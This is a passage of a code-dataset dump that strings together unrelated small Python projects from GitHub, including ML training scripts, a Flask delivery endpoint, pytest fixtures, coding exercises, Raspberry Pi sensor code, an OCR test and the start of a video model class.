= FeedBack(units=32, out_steps=OUT_STEPS)\n # train_and_evaluate(feedback_model, multi_window, multi_window, 'AR LSTM')\n\n metric_idx = repeat_baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\nif __name__ == \"__main__\":\n val_performance, performance, train_acc, val_acc, test_acc = {}, {}, {}, {}, {}\n num_features = 118\n MAX_EPOCHS = 200\n CONV_WIDTH = 5\n LABEL_WIDTH = 24\n INPUT_WIDTH = LABEL_WIDTH + (CONV_WIDTH - 1)\n OUT_STEPS = 24\n single_step_window = WindowGenerator(\n input_width=1, label_width=1, shift=1, label_columns=['DIJA'])\n wide_window = WindowGenerator(\n input_width=24, label_width=24, shift=1, label_columns=['DIJA'])\n wide_window_multi_out = 
WindowGenerator(\n input_width=24, label_width=24, shift=1)\n conv_window = WindowGenerator(\n input_width=CONV_WIDTH, label_width=1, shift=1, label_columns=['DIJA'])\n wide_conv_window = WindowGenerator(\n input_width=INPUT_WIDTH, label_width=LABEL_WIDTH, shift=1, label_columns=['DIJA'])\n multi_window = WindowGenerator(\n input_width=24, label_width=OUT_STEPS, shift=OUT_STEPS)\n\n metric_index = run_single_step_models()\n # _ = run_multi_output_models()\n # _ = run_multi_step_models()\n plot_experiments(metric_index, val_performance, performance, train_acc, val_acc, test_acc)\n","repo_name":"ricky-ma/NLPStonks","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31680989939","text":"from lcapy import s, sympify, j, sqrt\n\nzeta = sympify('zeta_', real=True)\nomega0 = sympify('omega0', real=True)\n\np1a = -zeta * omega0 + j * omega0 * sqrt(1 - zeta**2)\np1b = -zeta * omega0 - j * omega0 * sqrt(1 - zeta**2)\n\nalpha1 = sympify('alpha_1', real=True)\nomega1 = sympify('omega_1', real=True)\n\np1a = -alpha1 + j * omega1\np1b = -alpha1 - j * omega1\n\nH = p1a * p1b / ((s - p1a) * (s - p1b))\n\nG = H / s\n\ng = G.partfrac().inverse_laplace(causal=True)\nh = H.partfrac().inverse_laplace(causal=True)\n\ndef topy(expr):\n\n s = str(expr)\n s = s.replace('**', '^').replace('_', '').replace('*', ' * ').replace('^', '**').replace('Heaviside(t)', '(t >= 0)').replace('/', ' / ') \n return s\n\nprint(topy(g))\n\nprint(topy(h))\n","repo_name":"mph-/dsp-notebooks","sub_path":"intro/responses/pzlp2ud.py","file_name":"pzlp2ud.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"7607537115","text":"import time\n\n\nclass NotInteger(Exception):\n pass\n\n\nprint(\"First task\")\n\ntry:\n input_number = int(input(\"Enter a number or an Error will be thrown: \"))\n if type(input_number) != int:\n raise TypeError\nexcept (TypeError, ValueError):\n print(f'You entered an invalid number and an Error was thrown!')\n\n\ntime.sleep(2)\nprint(\"Second Task\")\n\ntry:\n second_task_number = int(input(\"Enter a number for the second task: \"))\n if type(second_task_number) != int:\n raise TypeError\nexcept (TypeError, ValueError):\n print(f'The number that you entered for the second task was invalid and an Error was thrown!')\nfinally:\n time.sleep(1)\n print(f'The entering phase ended.')\n\n\ntime.sleep(2)\nprint('Third task')\n\ntry:\n third_task_number = int(input(\"Enter a number for the third task: \"))\n if type(third_task_number) != int:\n raise NotInteger\nexcept (NotInteger, ValueError):\n time.sleep(1)\n print(\"The input data is not an integer!\")\n\ntime.sleep(2)\nprint(f'Fourth task')\ntime.sleep(1)\n\nclass GymPRs:\n def __init__(self, name, squat, deadlift, bench):\n self.name = name\n self.squat = squat\n self.deadlift = deadlift\n self.bench = bench\n\n def flex(self):\n print(f'{self.name} says: \"Yoo bro, my PRs are - deadlift: {self.deadlift}kg, benchpress: {self.bench}kg, squat: {self.squat}kg\"')\n\n def oneThousandPound(self):\n total_weight = self.squat + self.deadlift + self.bench\n total_weight_kg = total_weight * 0.45359237\n if total_weight_kg >= 453.592:\n print(\"Bro is in the 1000 pound club!\")\n else:\n remaining_weight_lb = round(1000 - (total_weight * 2.20462), 1)\n print(f\"Worthy for the 1000 pound club?\\nYou have to train more! You need {remaining_weight_lb}lbs more to reach the club.\")\n\n\nmy_Prs = GymPRs(\"Peter\", 110, 202, 100)\nmy_Prs.flex()\nmy_Prs.oneThousandPound()\n\nthe_data_is_valid = True\ntry:\n trainee_name = input(\"Enter your name: \")\n if type(trainee_name) != str:\n raise ValueError\nexcept ValueError:\n print(f'The name that you entered is not a string, and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_squat = int(input(\"Enter your squat PR: \"))\n if type(trainee_squat) != int:\n raise ValueError\nexcept ValueError:\n print(f'The squat PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_deadlift = int(input(\"Enter your deadlift PR: \"))\n if type(trainee_deadlift) != int:\n raise ValueError\nexcept ValueError:\n print(f'The deadlift PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_benchpress = int(input(\"Enter your benchpress PR: \"))\n if type(trainee_benchpress) != int:\n raise ValueError\nexcept ValueError:\n print(f'The benchpress PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\nif the_data_is_valid:\n time.sleep(1)\n trainee_Prs = GymPRs(trainee_name, trainee_squat, trainee_deadlift, trainee_benchpress)\n time.sleep(1)\n trainee_Prs.flex()\n time.sleep(1)\n trainee_Prs.oneThousandPound()\nelse:\n print(f'The class could not be called because you entered invalid data. Sorry.')\n","repo_name":"PowerCell46/Python-Programming-Basics","sub_path":"University Python Tasks/Lecture 8 Tasks.py","file_name":"Lecture 8 Tasks.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"412252395","text":"#!/usr/bin/env python3\n\nwith open('input1.txt', 'r') as f:\n lines = f.read().splitlines()\n\nclass Pack(object):\n def __init__(self):\n self.packs = list()\n self.total = 0\n\n def add(self, val):\n self.packs.append(val)\n self.total += val\n\npacks = [Pack()]\n\nfor line in lines:\n line = line.strip()\n if line == '':\n packs.append(Pack())\n continue\n val = int(line)\n packs[-1].add(val)\n\nbig = None\n\nfor pack in packs:\n if big is None or big.total < pack.total:\n big = pack\n\nprint(big.total)\n\n\n","repo_name":"mgeorg/advent_of_code2022","sub_path":"day01/day1p1.py","file_name":"day1p1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71570508703","text":"from flask import Blueprint, jsonify, current_app\n\nfrom app.config import QueueNames\nfrom app.delivery import send_to_providers\nfrom app.models import EMAIL_TYPE\nfrom app.celery import provider_tasks\nfrom app.dao import notifications_dao\nfrom app.errors import register_errors\n\ndelivery_blueprint = Blueprint('delivery', __name__)\n\n\nregister_errors(delivery_blueprint)\n\n\n@delivery_blueprint.route('/deliver/notification/', methods=['POST'])\ndef send_notification_to_provider(notification_id):\n notification = notifications_dao.get_notification_by_id(notification_id)\n if not notification:\n return jsonify({\"result\": \"error\", \"message\": \"No result found\"}), 404\n\n if notification.notification_type == EMAIL_TYPE:\n send_response(\n send_to_providers.send_email_to_provider,\n provider_tasks.deliver_email,\n notification,\n QueueNames.SEND_EMAIL\n )\n else:\n send_response(\n send_to_providers.send_sms_to_provider,\n provider_tasks.deliver_sms,\n notification,\n QueueNames.SEND_SMS\n )\n return jsonify({}), 204\n\n\ndef send_response(send_call, task_call, notification, queue):\n try:\n send_call(notification)\n except Exception as e:\n current_app.logger.exception(\n \"Failed to send notification, retrying in celery. ID {} type {}\".format(\n notification.id,\n notification.notification_type),\n e)\n task_call.apply_async((str(notification.id)), queue=queue)\n","repo_name":"govau/notify","sub_path":"api/app/delivery/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"}
+{"seq_id":"17381584777","text":"def sol(arr):\r\n n=len(arr)\r\n re1=['0']*n\r\n re2=['0']*n\r\n\r\n for i in range (n):\r\n if i%2==0:\r\n re1[i]='1'\r\n re2[i]='0'\r\n else:\r\n re1[i]='0'\r\n re2[i] = '1'\r\n t1=0\r\n t2=0\r\n for i in range(n):\r\n if arr[i]!=re1[i]:\r\n t1+=1\r\n if arr[i]!=re2[i]:\r\n t2+=1\r\n print(t1,t2)\r\n return min(t1,t2)\r\n\r\n\r\nif __name__ == '__main__':\r\n st='0001010111'\r\n str=list(st)\r\n print(sol(str))\r\n","repo_name":"Samundar9525/data_structure_using_Python","sub_path":"string/binary alternating.py","file_name":"binary alternating.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27846238863","text":"\"\"\"\nOperations to be shared across multiple tests\n\"\"\"\nimport pytest\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom two_step_zoo.datasets import Sphere, SupervisedDataset\nfrom two_step_zoo.networks import MLP\n\n\ndef pytest_configure():\n pytest.latent_dim = 2\n pytest.hidden_dims = [5, 5]\n pytest.batch_size = 5\n pytest.data_dim = 4\n pytest.data_len = 64\n pytest.image_data_shape = [3, 32, 32] # For Multiscale Flow\n pytest.noise_dim = 1 # For AVB\n pytest.activation = nn.ReLU\n pytest.optim_cfg = {\n \"optimizer\": \"sgd\",\n \"lr\": 1e-3,\n \"disc_lr\": 1e-3, # For AVB\n \"nll_lr\": 1e-3, # For AVB\n \"ge_lr\": 1e-3, # For BiGAN\n \"rec_lr\": 1e-3, # For WAE\n }\n\n\n@pytest.fixture\ndef dataloader():\n manifold_dim = 2\n\n dataset = Sphere(\"sphere\", \"train\", manifold_dim, pytest.data_dim, pytest.data_len)\n dataloader = DataLoader(dataset, pytest.batch_size)\n return dataloader\n\n\n@pytest.fixture\ndef imagelike_dataloader():\n dataset = SupervisedDataset(\n name=\"Test Image Dataset\",\n role=\"train\",\n x=torch.rand((pytest.data_len, *pytest.image_data_shape))\n )\n dataloader = DataLoader(dataset, pytest.batch_size)\n return dataloader\n\n\n@pytest.fixture\ndef batch(dataloader):\n for batch in dataloader:\n return batch\n\n\n@pytest.fixture\ndef basic_encoder():\n return MLP(\n input_dim=pytest.data_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=pytest.latent_dim,\n activation=pytest.activation\n )\n\n\n@pytest.fixture\ndef basic_decoder():\n return MLP(\n input_dim=pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=pytest.data_dim,\n activation=pytest.activation\n )\n\n\n@pytest.fixture\ndef multihead_encoder():\n return MLP(\n input_dim=pytest.data_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=2*pytest.latent_dim,\n activation=pytest.activation,\n output_split_sizes=[pytest.latent_dim, pytest.latent_dim]\n )\n\n\n@pytest.fixture\ndef multihead_decoder():\n return MLP(\n input_dim=pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=2*pytest.data_dim,\n activation=pytest.activation,\n output_split_sizes=[pytest.data_dim, pytest.data_dim]\n )\n\n\n@pytest.fixture\ndef basic_discriminator():\n return MLP(\n input_dim=pytest.data_dim+pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=1,\n activation=pytest.activation\n )\n","repo_name":"layer6ai-labs/two_step_zoo","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"74733427742","text":"# code_#1 image segmentation\n\n'''从文件夹中读取所有图片,并从每张图片的一系列坐标开始,以100*100/33*33的大小的分割框对图像进行分割;每个点之间相距30个像素点\n,每次向右移动60/30像素,将图片分割成小图片。最终以原图片名+行名(A-H)+列名(1-12)的形式保存在一个以原图片名为名的文件夹中'''\n\nimport cv2\nimport os\nfile_pathname=\"\" #文件路径\n\ndef read_path(file_pathname):\n for root, dirs, files in os.walk(file_pathname):\n #os.walk \n for file in files: \n ##print(file_pathname+'/'+file) #test code\n if file.endswith('.png'): #selcet picture\n #Load pictures\n img = cv2.imread(file_pathname+'/'+file)\n file_name, file_extend = os.path.splitext(file) \n # Define the coordinates坐标 and size of the crop box\n\n coords = [[275,225], [275,255], [275, 285], [275,315], [275, 345], [275,375], [275, 405], \n [275,435], [275, 465], [275,495], [275, 525], [275,555], [275, 585], [275,615],[275, 645],[275,675]]\n width, height = 33, 33\n move_x = 30\n #当分割框包含1个衣藻时选择该组参数\n\n\n '''\n coords = [[275,225], [275, 285],[275, 345], [275, 405], [275, 465], [275, 525], [275, 585], [275, 645]]\n width, height = 100, 100\n move_x = 60\n #当分割框包含9个衣藻时选择该组参数\n '''\n\n\n # Loop through all the coordinates and crop the image\n for i, coord in enumerate(coords):\n x, y = coord\n for j in range(1,25): \n crop_img = img[y:y+height, x:x+width]\n cv2.imwrite(f\"D:\\\\desktop\\\\Fredrik\\\\Supplemental_Data_Set_1\\\\Image_segmentation\\\\B_TAP_photos_segmentation_in_one\\\\{file_name}_{chr(i+65)}_{j}.jpg\", crop_img)\n x += move_x\n\nread_path(file_pathname)\n\n# code_#2 color_standard_generate\nfrom PIL import Image\nimport openpyxl\n\n# 定义起始颜色和结束颜色\nstart_color = (0, 30, 0 ) # 墨绿色\nend_color = (240, 240, 50) # 黄绿色\n\n# 定义Excel文件名和工作表名\nfilename = \"\"\nsheetname = \"Color standards\"\n\n# 定义Excel中起始单元格的位置\nstart_row = 1\nstart_col = 1\n\n# 定义颜色图的尺寸和颜色数量\nwidth = 1\nheight = 300\nnum_colors = height\n\n# 生成颜色图\ngradient = Image.new('RGB', (width, height))\nfor i in range(num_colors):\n r = start_color[0] + int((i / num_colors) * (end_color[0] - start_color[0]))\n g = start_color[1] + int((i / num_colors) * (end_color[1] - start_color[1]))\n b = start_color[2] + int((i / num_colors) * (end_color[2] - start_color[2]))\n gradient.putpixel((0, i), (r, g, b))\n\n# 将颜色输出到Excel中\nwb = openpyxl.Workbook()\nws = wb.active\nfor i in range(num_colors):\n color = gradient.getpixel((0, i))\n ws.cell(row=start_row+i, column=start_col).value = f\"RGB({color[0]}, {color[1]}, {color[2]})\"\n ws.cell(row=start_row+i, column=start_col+1).fill = openpyxl.styles.PatternFill(start_color='FF'+\"\".join([hex(c)[2:].rjust(2, '0').upper() for c in color]), fill_type='solid')\n \n# 保存Excel文件\nwb.save(filename)\n","repo_name":"Fredrik-Qi/Phenotypic-Quantification-and-Clustering-Analysis-of-Chlamydomonas-reinhardtii-Mutants_code","sub_path":"Supplemental_Data_Set_1.py","file_name":"Supplemental_Data_Set_1.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25541331245","text":"test_case = int(input())\r\nres = []\r\nnum = []\r\nfnum = ''\r\nwithdraw_amount = []\r\nfor i in range(test_case):\r\n n,bal = input().split(' ')\r\n n = int(n)\r\n bal = int(bal)\r\n withdraw_amount = list(map(int,input().split()))\r\n for k in withdraw_amount:\r\n avlbl = bal - k\r\n if avlbl < 0:\r\n num.append('0')\r\n else:\r\n num.append('1')\r\n bal -= k\r\n for l in num:\r\n fnum += l\r\n res.append(fnum)\r\n fnum = ''\r\n num.clear()\r\nfor i in res:\r\n print(i)\r\n\r\n\r\n\r\n","repo_name":"SanjayKotabagi/CODECHEF_SOLUTIONS","sub_path":"BEGINNER_LEVEL/ATM2.py","file_name":"ATM2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34217888584","text":"# -*- coding: utf-8 -*-\r\nimport pyxel\r\nfrom module.character import HumanGenerator\r\nfrom module.fieldStates.baseFieldState import BaseFieldState\r\nfrom module.map.cemetery import cemetery\r\nfrom module.params.monster import monsterParams\r\nfrom overrides import overrides\r\n\r\n\r\nclass StateCemetery(BaseFieldState):\r\n '''\r\n 墓地の地下のクラス\\n\r\n BaseFieldStateを継承。\r\n '''\r\n # State名\r\n stateName = \"CEMETERY\"\r\n\r\n # マップ\r\n _map = cemetery.map\r\n\r\n # 出現するモンスターリスト\r\n enemy_set = (\r\n HumanGenerator.generate(1),\r\n HumanGenerator.generate(2),\r\n monsterParams[\"WOLF_LV1\"],\r\n monsterParams[\"BAT_LV1\"],\r\n monsterParams[\"ZOMBIE_LV1\"],\r\n monsterParams[\"SKELETON_LV1\"],\r\n )\r\n\r\n def __init__(self, **kwargs):\r\n '''\r\n クラス初期化\r\n '''\r\n super().__init__(**kwargs)\r\n\r\n @overrides\r\n def onEnter(self):\r\n '''\r\n 状態開始時の処理\r\n '''\r\n super().onEnter()\r\n\r\n # 壁の色を初期化する\r\n self.set_wall_color(pyxel.COLOR_RED, pyxel.COLOR_PURPLE)\r\n\r\n @overrides\r\n def onExit(self):\r\n '''\r\n 状態終了時の処理\r\n '''\r\n super().onExit()\r\n","repo_name":"aburi6800/Python-OnyxOfBlack","sub_path":"source/module/fieldStates/stateCemetery.py","file_name":"stateCemetery.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"6084254680","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport time\nimport RPi.GPIO as io\nimport signal\nimport atexit\n\n# GPIO konfigurieren\nio.setmode(io.BCM)\n\n#Variablen deklarieren\nPIR_PIN = 4\nLED_PIN = 27\n\n# Funktionen\ndef signal_term_handler(signal, frame):\n print('got SIGTERM')\n io.cleanup()\n sys.exit(0)\n\ndef goodbye():\n print('Goodbye')\n io.cleanup()\n\ndef main():\n global turned_off\n global motion_count\n\n print('start - Warten auf erstes Event', flush=True)\n\n while True:\n if io.input(PIR_PIN):\n io.output(LED_PIN, io.HIGH)\n print(time.strftime('Bewegung erkannt %H:%M:%S '), flush=True)\n time.sleep(1)\n io.output(LED_PIN, io.LOW)\n time.sleep(.5)\n\n# --------------------------------------------------------------------\n# los gehts \n#---------------------------------------------------------------------\n\n# Abfangen von SIGTERM\nsignal.signal(signal.SIGTERM, signal_term_handler)\n\n# Abfangen von KeyboardInterrupt CRTL-C\natexit.register(goodbye)\n\n# IO setzen für LED und PIR\nio.setup(PIR_PIN, io.IN, pull_up_down=io.PUD_DOWN)\nio.setup(LED_PIN, io.OUT)\n\n# und los gehts\nmain()\n","repo_name":"spitzlbergerj/CaravanPi","sub_path":"pir/pir-testgeraet.py","file_name":"pir-testgeraet.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"}
+{"seq_id":"22712766748","text":"import numpy as np\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers.core import Dense\nfrom sklearn import datasets\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.optimizers import Adam\nfrom sklearn.model_selection import cross_validation\n\ndataset = datasets.load_iris()\n\nfeatures = dataset.data\ny= dataset.target.reshape(-1,1)\n\nencoder=OneHotEncoder()\ntarget=encoder.fit_transform(y)\n\ntrain_feature,test_feature,train_target,test_target=train_test_split(features,target,test_size=0.3)\n\nmodel= Sequential()\n\nmodel.add(Dense(10,input_dim=4, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(3, activation='sigmoid'))\n\noptimizers=Adam(lr=0.05)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers,\n metrics=['accuracy'])\n\nmodel.fit(train_feature,train_target,batch_size=20,epochs=1000, verbose=2)\n\nresult=model.evaluate(test_feature,test_target)\n\nprint(\"Resultant Error %.2f\",result[0])\nprint(\"Resultant accuracy %.2f\",result[1])\n","repo_name":"varunsly/Neural_Network_Iris-dataset_Prediction","sub_path":"Iris_keras.py","file_name":"Iris_keras.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31584609927","text":"from starlette.responses import JSONResponse\nfrom uuid import uuid4\nfrom src.extensions import create_virtual_account\nfrom src.extensions import create_contact\n\nfrom src.utils.http import session\n\nfrom src.models.request.razorpay import VirtualAccoutRequest\nfrom src.models.request.razorpayx import CreateContactRequest\n\nfrom src.database.models.users import User\nfrom src.database.models.account import Account\nfrom src.database.models.upi import UPI\n\nfrom src.database.database import async_db_session\n\n\n\nasync def create_account(request):\n json = await request.json()\n user_id = json.get(\"user_id\")\n\n if not user_id:\n return JSONResponse({\"message\": \"user_id is required\"}, status_code=400)\n\n else:\n try:\n user: User = await User.get(user_id)\n print(user)\n contact_request = CreateContactRequest(\n name=user.full_name,\n contact=json.get(\"contact\"),\n email=json.get(\"email\"),\n type=json.get(\"type\"),\n reference_id=json.get(\"reference_id\"),\n notes=[],\n )\n contact = await create_contact(session=session, data=contact_request)\n except Exception as e:\n print(str(e))\n return JSONResponse(\n {\"message\": str(e), \"error\": \"Could not create Contact\"},\n status_code=400,\n )\n\n # receivers = {\n # \"types\": [\"vpa\"],\n # \"vpa\": {\n # \"descriptor\": user.full_name.replace(\" \", \"-\"),\n # },\n # }\n try:\n # account_request = VirtualAccoutRequest(\n # receivers=receivers,\n # close_by=None,\n # notes=json.get(\"notes\"),\n # description=json.get(\"description\"),\n # customer_id=contact.id,\n # )\n # virtual_account = await create_virtual_account(\n # session=session, data=account_request\n # )\n # MOCK ACCOUNT CREATION\n upi_id = ''\n \n upi_id = await UPI.get_by_user_id(user_id)\n if upi_id:\n account = await Account.get_by_user_id(user_id)\n return JSONResponse({\n \"user_id\": user_id,\n \"account_id\": account.id,\n \"balance\": float(account.balance),\n \"upi_id\": upi_id.id,\n })\n else:\n account_id = str(uuid4())\n upi_id = f\"{user.full_name.lower().replace(' ', '-')}@okicici\"\n \n await Account.create(id=account_id, balance=0, contact_id=contact.id, user_id=user_id)\n await UPI.create(id=upi_id, user_id=user_id)\n \n except Exception as e:\n print('2')\n await async_db_session.rollback()\n return JSONResponse(\n {\"message\": str(e), \"error\": \"Could not create Account\"},\n status_code=400,\n )\n\n return JSONResponse({\n \"user_id\": user_id,\n \"account_id\": account_id,\n \"balance\": 0,\n \"upi_id\": upi_id,\n })\n","repo_name":"SudodevsHQ/betsushi","sub_path":"src/routes/create_virtual_account.py","file_name":"create_virtual_account.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"70376907422","text":"# USSD program to withdraw,check balance,send money,buy airtime,\nuser={\n \"Name\":\"Mike\",\n \"Agent_no\":'4463',\n \"Pin\":'2342',\n \"Balance\":1000\n}\ndef menu():\n print(f\"Hello {user['Name']}, \\n Welcome to Safaricom\")\n print(\"What do you want to do?\")\n print(\"1. Withdraw Money\")\n print(\"2. Check Balance\")\n print(\"3. Send Money\")\n print(\"4. Buy Airtime\")\n \ndef Withdraw(withdraw_amount):\n transaction_fee=30\n menu()\n\n option=input(\"Select your Option: \")\n if option ==\"1\":\n # check if the balance is more than the withdraw_amount\n # if user['Balance'] <= withdraw_amount:\n # print(f\"Sorry {user['Name']} \\n Insufficient balance!!! \")\n if user['Balance'] < (withdraw_amount + transaction_fee):\n print(\"Failed \\n You must have the transaction fee to complete this request\")\n else:\n # prompt user to input agent number\n agent_no=input(\"Enter Agent number: \")\n if agent_no != user['Agent_no']:\n print(\"Wrong/ Invalid agent number\")\n else:\n pin=input(\"Enter your pin: \")\n if pin != user['Pin']:\n print(\"Wrong pin. \\n Try again later\")\n # withdraw_amount(amount)\n else:\n new_balance=user['Balance'] -(withdraw_amount + transaction_fee)\n print(f\"Withdrawal Successful You have withdrawn {withdraw_amount} from agent number {user['Agent_no']} \\n Your new balance is {new_balance} \\n Thank you being Our esteemed Customer\") \n else:\n print(\"Sorry!!1 Service On Progress\") \n \n# Withdraw(900)\n \n \n \n ","repo_name":"maxmusau/Python","sub_path":"Lesson7d.py","file_name":"Lesson7d.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"36282834745","text":"from paddleocr import PaddleOCR\nimport sys\n\nsys.path.append(\"/mnt/Software/200-Apps/imageFlow\")\nfrom config import fm_config\n\nfname = \"/mnt/Software/200-Apps/test/IN/download.jpg\"\n\n#\n# ocr = PaddleOCR(\n# det_model_dir=fm_config.DET_MODEL_DIR,\n# rec_model_dir=fm_config.REC_MODEL_DIR,\n# # rec_char_dict_path=\"\",\n# cls_model_dir=fm_config.CLS_MODEL_DIR,\n# use_angle_cls=fm_config.USE_ANCLE_CLS,\n# lang=fm_config.IMG_OCR_LANG,\n# )\n\nocr = PaddleOCR(\n det_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/det/en/en_PP-OCRv3_det_infer/\",\n rec_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/rec/en/en_PP-OCRv3_rec_infer/\",\n # rec_char_dict_path=\"\",\n cls_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/cls/ch_ppocr_mobile_v2.0_cls_infer/\",\n use_angle_cls=True,\n lang=\"en\",\n)\ntext = \"\"\ntry:\n result = ocr.ocr(fname, det=True, cls=True)\n for idx in range(len(result)):\n res = result[idx]\n for line in res:\n text = text + \" \" + line[1][0]\n if len(text):\n print(text)\n\n else:\n print(\"NO text found\")\nexcept Exception as e:\n print(e)\n","repo_name":"Cap-n-Proud/imageflow","sub_path":"units/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40508004298","text":"\"\"\"Module defining the domain model entities.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os.path\nimport re\nfrom collections.abc import Generator\nfrom dataclasses import asdict, dataclass\nfrom datetime import datetime, timedelta\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import Any\n\nimport cv2 as cv\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nVIDEO_DEFAULT_HEIGHT: int = 360\nVIDEO_DEFAULT_WIDTH: int = 640\n\n\nclass TimestampNotFoundError(Exception):\n \"\"\"Exception to raise if no timestamp are found.\"\"\"\n\n\nclass Status(str, Enum):\n \"\"\"Enum for job progress.\"\"\"\n\n PENDING = \"Pending\"\n RUNNING = \"Running\"\n PAUSED = \"Paused\"\n DONE = \"Done\"\n QUEUED = \"Queued\"\n ERROR = \"Error\"\n\n\nclass Video:\n \"\"\"Video class.\n\n This class provides various functions to retrieve data from a video file.\n\n Parameters\n ----------\n path : str\n Path to this video file as a string\n frame_count : int\n Number of frames in the video\n fps : int\n Frames per second in the video\n width : int\n Width in pixels\n height : int\n Height in pixels\n timestamp : datetime\n timestamp for when the video starts\n output_width : int\n Frame output width. Default to `VIDEO_DEFAULT_WIDTH`\n constant.\n output_height : int\n Frame output height. Default to\n `VIDEO_DEFAULT_HEIGHT` constant.\n\n Attribute\n ---------\n _path : str\n Path to the video file associated with the video.\n id : Optional[int]\n Video id from repository(database).\n frames : List[Frame]\n List of data frames containing detections associated with video.\n\n Methods\n -------\n vidcap_release()\n Release OpenCV videocapture on associated video file.\n exists()\n Checks if the path is valid, by checking if its a file on the disk.\n from_path(path: str)\n Named constructor that creates and populates a video object with\n metadata read from the file. 
Raises FileNotFoundError if the\n file could not be read, or is not a video file.\n timestamp_at(idx: int)\n Return timestamp at index in video as a `datetime` object.\n add_detection_frame(frame: Frame)\n Add a single data-frame containing detections to this video.\n is_processed()\n Checks if the video has been fully processed by comparing with\n self.frames.\n\n Examples\n --------\n >>> video = Video.from_path(\"test.mp4\")\n >>> one_frame = video[5]\n >>> print(one_frame.shape)\n (720, 1280, 3)\n >>> many_frames = video[5:10]\n >>> print(many_frames.shape)\n (5, 720, 1280, 3)\n >>> len(video)\n 20\n >>> many_frames = video[10:]\n >>> print(many_frames.shape)\n (10, 720, 1280, 3)\n\n Raises\n ------\n FileNotFoundError\n If error reading video file when creating `from_path()`.\n TimestampNotFound\n If no timestamp were found when creating `from_path()`.\n \"\"\"\n\n def __init__(\n self,\n path: str,\n frame_count: int,\n fps: int,\n width: int,\n height: int,\n timestamp: datetime,\n output_width: int = VIDEO_DEFAULT_WIDTH,\n output_height: int = VIDEO_DEFAULT_HEIGHT,\n ) -> None:\n self.id: int | None = None\n self._path: str = path\n self.frame_count: int = frame_count\n self.fps: int = fps\n self.width: int = width\n self.height: int = height\n self.output_width: int = output_width\n self.output_height: int = output_height\n self.timestamp: datetime = timestamp\n self._current_frame = 0\n self._video_capture: cv.VideoCapture = cv.VideoCapture(self._path) # type: ignore\n self.frames: list[Frame] = []\n\n if output_height <= 0 or output_width <= 0:\n raise ValueError(\n f\"Output width and height must be positive, not {output_width}, {output_height}\",\n )\n\n def _scale_convert(self, img: np.ndarray) -> np.ndarray:\n \"\"\"Convert and scale image using OpenCV.\n\n Converts image from BGR to RGB, and scales down to\n `self.output_{height,width}`\n\n Parameter\n ---------\n img : np.ndarray\n image to convert and scale\n\n Return:\n ------\n ndarray:\n Scaled and converted image\n \"\"\"\n new_img = cv.cvtColor(img, cv.COLOR_BGR2RGB) # type: ignore\n\n new_img = 